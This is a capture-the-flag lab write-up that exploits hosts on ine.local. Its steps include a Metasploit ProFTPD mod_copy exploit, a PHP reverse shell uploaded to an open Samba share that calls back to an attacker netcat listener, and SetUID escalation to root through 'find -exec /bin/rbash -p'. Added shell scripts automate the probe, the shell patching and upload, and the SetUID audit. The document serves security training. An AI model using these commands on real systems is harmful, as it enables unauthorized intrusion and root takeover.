CTF 3 - Exploitation


Question 1

A vulnerable service may be running on target1.ine.local. If exploitable, retrieve the flag from the root directory.

First, run a basic Nmap scan to find out what is running on the target. The FTP service identifies itself as ProFTPD 1.3.5, so search for an exploit using SearchSploit. There is a Metasploit module for this version (proftpd_modcopy, which abuses the mod_copy SITE CPFR/CPTO commands) that we can use to exploit the service.

Load up Metasploit and run the exploit. Note that you will need to change the SITEPATH option: the documentation page hosted on port 80 states that the Apache HTTP server's web root is /var/www/html, and the module needs the real web root because it copies its PHP payload there and then triggers it with an HTTP request.

We can then upgrade our session to a Meterpreter session and open a shell. Navigate to the root directory (/) to get the flag.
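Before firing the module it is worth confirming that mod_copy is actually reachable without a login, because that unauthenticated copy is exactly what proftpd_modcopy relies on. The following is an added example, not part of the original writeup or of the Metasploit module: the host name target1.ine.local comes from the question, while the function names, the use of nc as the FTP client and the 350/5xx reply classification are my own assumptions about a stock ProFTPD reply set.

```sh
#!/bin/sh
# Added example: probe a ProFTPD server for an unauthenticated mod_copy (SITE CPFR).
# A server that exposes mod_copy before login answers SITE CPFR with a 350 reply
# ("File or directory exists, ready for destination name"); one that does not
# answers with a 5xx reply (530 "Please login" when the copy commands are gated
# behind authentication, 500 when SITE CPFR is not understood at all).
# CPFR only records a source path, so the probe changes nothing on the target.

# Classify one FTP reply line read on stdin: prints enabled, absent or unknown.
modcopy_reply_status() {
    read -r line || :
    case "$line" in
        350*)          echo enabled ;;
        5[0-9][0-9]*)  echo absent ;;
        *)             echo unknown ;;
    esac
}

# Send SITE CPFR before any USER/PASS and classify the first relevant reply.
# $1 = host, $2 = port (default 21). Requires nc (netcat) on the attacker box.
probe_modcopy() {
    host=$1
    port=${2:-21}
    printf 'SITE CPFR /etc/passwd\r\nQUIT\r\n' \
        | nc -w 5 "$host" "$port" \
        | grep -E '^(350|5[0-9][0-9]) ' \
        | head -n 1 \
        | modcopy_reply_status
}

# Usage (not run automatically): sh modcopy_probe.sh target1.ine.local
if [ "$#" -gt 0 ]; then
    status=$(probe_modcopy "$@")
    echo "mod_copy on $1: $status"
    [ "$status" = enabled ]
fi
```

A result of enabled means the SITE CPFR/CPTO pair is usable without credentials and the module is worth running; absent means the server either requires a login first or has no mod_copy, so the exploit will not work regardless of SITEPATH.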

Question 2

Further, a quick interaction with a local network service on target1.ine.local may reveal this flag. Use the hint given in the previous flag.

The question says that a local network service on the target is of interest, i.e. one bound to the loopback interface, which the Nmap scan from our own machine could not see. Note that you need to run the following command on target1 from within the Meterpreter session. To view the listening services on the target:

netstat -tuln | grep 127.0.0.1

netstat takes no address argument of its own: -tuln lists TCP and UDP sockets in the listening state with numeric addresses, and the grep keeps only those bound to the loopback address. We can see that port 8888 is open on 127.0.0.1 only, so we interact with it using Netcat from the target. Note that you will first need to open a shell from Meterpreter and run /bin/bash -i to get an interactive shell:

nc 127.0.0.1 8888

The service asks for a password. The hint from the previous flag was the phrase letmein; entering it gives us the second flag.
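To make the loopback-only check mechanical, here is an added example (not from the original writeup) that filters netstat -tuln output down to sockets bound to the loopback address, which is exactly the class of service an external Nmap scan cannot see. The sample netstat output is constructed to mirror the situation on target1.ine.local and is not a capture from the lab; the function names and the port 8888 service are taken from the question.

```sh
#!/bin/sh
# Added example: pick out services that listen on the loopback interface only,
# from 'netstat -tuln' output. These never show up in a scan from the attacker
# box, so they are found only after getting a shell on the target.

# Constructed sample of 'netstat -tuln' (not a real capture from the lab).
SAMPLE_NETSTAT='Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:21              0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:8888          0.0.0.0:*               LISTEN
tcp6       0      0 :::80                   :::*                    LISTEN
udp        0      0 0.0.0.0:68              0.0.0.0:*'

# Read netstat -tuln output on stdin; print "proto port" for every socket whose
# local address is 127.x.x.x or ::1. Column 4 is "address:port"; the port is the
# text after the last colon, which also copes with IPv6 addresses.
loopback_only_listeners() {
    awk '$1 ~ /^(tcp|udp)6?$/ && ($4 ~ /^127\./ || $4 ~ /^::1:/) {
             n = split($4, parts, ":")
             print $1, parts[n]
         }'
}

# Run the filter against the live system. On the target this is typed in the
# shell obtained from Meterpreter (shell, then /bin/bash -i).
live_loopback_listeners() {
    netstat -tuln 2>/dev/null | loopback_only_listeners
}

# Talk to one of the discovered services; a prompt such as "Password:" is then
# answered interactively (letmein here, the hint from the first flag).
connect_local() {
    nc 127.0.0.1 "$1"
}

# Stand-alone demonstration on the constructed sample: prints "tcp 8888".
printf '%s\n' "$SAMPLE_NETSTAT" | loopback_only_listeners
```

Anything the filter prints is a candidate for the Netcat interaction above; anything bound to 0.0.0.0 or ::: should already have appeared in the external scan.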

Question 3

A misconfigured service running on target2.ine.local may help you gain access to the machine. Can you retrieve the flag from the root directory?

Again, run an Nmap scan to see what services are running on the target. SMB is running, served by Samba in this case. We can enumerate shares and other useful information using enum4linux.

The share site-uploads is accessible without credentials, and its contents are also served by the web server, so let's navigate to it in our web browser. Since we can upload files to the share using smbclient, copy a PHP reverse shell (Kali ships pentestmonkey's in its webshells package) to our current directory:

cp /usr/share/webshells/php/php-reverse-shell.php .

Make sure the shell has been edited first (see the next paragraph). We then upload it to the share by connecting with smbclient; -N skips the password prompt, since the share needs no credentials:

smbclient -N //target2.ine.local/site-uploads

# To upload the file:
put php-reverse-shell.php

Please note that the PHP reverse shell has to be edited before it is uploaded, otherwise it will try to connect back to the wrong place. Using a text editor of your choice (vim or nano), replace the $ip value with your IP address, as this is the address the shell connects back to, and make sure $port matches the listener you are about to start. Then set up a listener using Netcat (nc -nvlp 1234) to catch the reverse connection when the shell is executed.

Now open the directory in the web browser again and click on php-reverse-shell.php; the web server executes the script, which connects back to us. Head over to the Netcat listener and we have a shell on target2. Again, navigate to the root directory (/) to cat out the flag.
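The two edits in php-reverse-shell.php are easy to get wrong (a stale $ip, or a $port that does not match the listener, means the click in the browser silently does nothing), so here is an added example, not from the original writeup or from pentestmonkey, that patches both values with sed and verifies them before the upload. The helper is demonstrated against a constructed stand-in containing only the two lines of interest; the attacker address 10.10.10.5 is a placeholder, and the share path comes from the writeup.

```sh
#!/bin/sh
# Added example: set the call-back address and port in pentestmonkey's
# php-reverse-shell.php, confirm the edit, then upload it over SMB and listen.

# Constructed stand-in for the two lines of php-reverse-shell.php that have to
# change (the real file is /usr/share/webshells/php/php-reverse-shell.php on Kali).
SAMPLE_SHELL_LINES="\$ip = '127.0.0.1';  // CHANGE THIS
\$port = 1234;       // CHANGE THIS"

# patch_reverse_shell FILE LHOST LPORT: rewrite the $ip and $port assignments
# in place (a .bak copy of the original is kept next to it).
patch_reverse_shell() {
    sed -i.bak \
        -e "s/^\\\$ip = '[^']*';/\$ip = '$2';/" \
        -e "s/^\\\$port = [0-9]*;/\$port = $3;/" \
        "$1"
}

# reverse_shell_target FILE: print "ip port" as currently configured in the
# file, so the values can be checked against the listener before uploading.
reverse_shell_target() {
    ip=$(sed -n "s/^\\\$ip = '\\([^']*\\)';.*/\\1/p" "$1")
    port=$(sed -n "s/^\\\$port = \\([0-9]*\\);.*/\\1/p" "$1")
    echo "$ip $port"
}

# upload_and_listen FILE LPORT: put the file on the open share (no credentials,
# hence -N) and start the listener. Not run automatically; once nc is waiting,
# request the file in the browser to trigger the connection back.
upload_and_listen() {
    smbclient -N "//target2.ine.local/site-uploads" -c "put $1"
    nc -nvlp "$2"
}

# Stand-alone demonstration on the constructed lines (placeholder LHOST 10.10.10.5).
demo=$(mktemp)
printf '%s\n' "$SAMPLE_SHELL_LINES" > "$demo"
patch_reverse_shell "$demo" 10.10.10.5 1234
reverse_shell_target "$demo"    # prints: 10.10.10.5 1234
rm -f "$demo" "$demo.bak"
```

In practice the sequence is patch_reverse_shell on the real file, reverse_shell_target to eyeball the result, then upload_and_listen with the same port; the port printed by reverse_shell_target is the one nc must listen on.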

Question 4

Can you escalate to root on target2.ine.local and read the flag from the restricted /root directory?

For this question, I really got stuck - so big thanks to @Prinu_17 for her writeup.

First, check which shells are installed on the system and what permissions each one has, which we can do with the following command:

grep -v '^#' /etc/shells | while read -r shell; do ls -l "$shell" 2>/dev/null; done

The loop reads each shell listed in /etc/shells (skipping comment lines) and prints its permissions with ls -l; 2>/dev/null suppresses the error for any shell that is listed but not actually installed. What we are looking for is a shell owned by root with the SetUID bit set, shown as an s in the owner's execute position (e.g. -rwsr-xr-x).

Such a shell would give us root directly, but a listed shell without that bit is no use for escalation. So we also need to check for other executables with the SetUID bit set that run with root privileges. The SetUID bit makes a program run with the privileges of the file's owner (e.g. root) rather than those of the user who starts it, so a root-owned SetUID binary that can execute other programs lets us escalate.

To check for executables with the SetUID bit set that can run with root privileges, we can run the command:

find / -type f -perm -4000 -user root 2>/dev/null

This starts searching from the root directory (/) and lists regular files (-type f) with the SetUID bit set (-perm -4000) that are owned by root (-user root). Error messages from directories we cannot read are suppressed by redirecting them to /dev/null.

Here find itself shows up in that list, so it runs with root's effective UID, and any program it launches through -exec inherits it. We can therefore use find to spawn a root shell. The -p flag is essential: without it bash would notice that the effective UID differs from the real UID and drop back to our own privileges. -quit stops the search after the first path, so only one shell is spawned:

find / -exec /bin/rbash -p \; -quit

Now that we have escalated to root (confirm with id, which should report euid=0), we can cat out the last flag using cat /root/flag4.txt.
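The SetUID hunt is the part of this box that generalises, so here is an added example, not from the writeup or from @Prinu_17, that wraps the checks above in reusable functions: one reports SetUID shells from /etc/shells, one lists root-owned SetUID binaries under a path, and one flags names known to let a SetUID copy run other commands, which is the property that makes find -exec work here. The demonstration files are constructed by the test rather than taken from the lab, the function names are my own, and the list of abusable names is a short selection of my own rather than anything exhaustive.

```sh
#!/bin/sh
# Added example: the SetUID checks from this question as reusable functions.

# suid_shells [SHELLS_FILE]: print each shell listed in /etc/shells (comment
# lines skipped) that exists and carries the SetUID bit (test -u), i.e. a shell
# that would give root directly.
suid_shells() {
    grep -v '^#' "${1:-/etc/shells}" | while read -r shell; do
        [ -u "$shell" ] && echo "$shell" || :
    done
}

# list_suid [DIR] [OWNER]: regular files under DIR (default /) with the SetUID
# bit set and owned by OWNER (default root); unreadable directories are ignored.
list_suid() {
    find "${1:-/}" -type f -perm -4000 -user "${2:-root}" 2>/dev/null
}

# Short selection of programs that run other commands when SetUID, the class
# documented on GTFOBins (not exhaustive).
ABUSABLE_SUID="find bash sh dash env python perl vim less awk cp"

# flag_abusable: read paths on stdin, print "path  name" for every basename in
# ABUSABLE_SUID; a version suffix such as python3.8 matches its base name.
flag_abusable() {
    while read -r path; do
        name=${path##*/}
        for candidate in $ABUSABLE_SUID; do
            case "$name" in
                "$candidate"|"$candidate"[0-9.]*) echo "$path  $candidate"; break ;;
            esac
        done
    done
}

# root_shell_via_find [DIR]: the writeup's escalation. Only meaningful when find
# is SetUID root: -exec runs the shell with root's effective UID, -p keeps bash
# from dropping it, -quit stops after the first path so one shell is spawned.
root_shell_via_find() {
    find "${1:-/}" -exec /bin/rbash -p \; -quit
}

# Usage (not run automatically):
#   sh suid_audit.sh --scan   -> SetUID shells, then abusable root SetUID binaries
#   root_shell_via_find       -> only after find appears in that output
if [ "$#" -gt 0 ] && [ "$1" = --scan ]; then
    suid_shells
    list_suid / root | flag_abusable
fi
```

Running the scan before choosing an escalation path avoids guessing: a line naming find, bash or sh in the flagged output points straight at the command above, while a hit on something like passwd or sudo is normal and not, by itself, a way in.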
